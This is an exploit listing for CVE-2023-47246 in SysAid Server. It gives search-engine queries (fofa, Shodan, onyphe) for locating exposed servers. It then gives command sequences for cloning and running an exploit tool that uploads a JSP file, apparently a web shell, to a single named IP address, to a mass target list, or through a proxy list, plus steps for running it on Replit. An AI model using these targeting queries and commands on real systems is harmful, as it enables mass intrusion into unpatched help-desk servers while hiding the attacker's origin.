## https://sploitus.com/exploit?id=31D0B7D1-9AB7-56F9-94D3-8F52B74793DD
# Vulnerability details
## Clone on replit:
[![Run on Replit](https://replit.com/badge/github/tucommenceapousser/CVE-2023-47246)](https://replit.com/github/tucommenceapousser/CVE-2023-47246)
1. fofa:
```text
body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
```
Shodan:
```
http.favicon.hash:1540720428
```
onyphe.io:
[https://www.onyphe.io/search?q=category%3Adatascan+cpe%3A%22cpe%3A%2Fa%3Asysaid%3Ahelp_desk_software%3A-%22](https://t.co/oeRLgORoIv)
2. Affected versions: SysAid Server < 23.3.36
# Vulnerability reproduction
1. Execute the script:
## Mode Single
```shell
git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
cd CVE-2023-47246
pip install -r requirements.txt
chmod +x expp
./expp -u https://170.82.173.30:443 -f def.jsp
```
## Mode Mass
```shell
git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
cd CVE-2023-47246
pip install -r requirements.txt
chmod +x expp
./expp -m urls.txt -f def.jsp
```
## Mode Proxy-List
```shell
git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
cd CVE-2023-47246
pip install -r requirements.txt
chmod +x exp
./exp -m urls.txt --proxy-list proxies.txt -f def.jsp
```
2. Result: ![](https://static-trkn.replit.app/47246.jpg)
# On Replit
Change the first line of exp to:
```
#!venv/bin/python
```
Then run these commands:
```
python -m venv venv
```
```
source venv/bin/activate
```
```
chmod +x exp
```
```
exp -m urls.txt -f def.jsp
```
# Reference
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability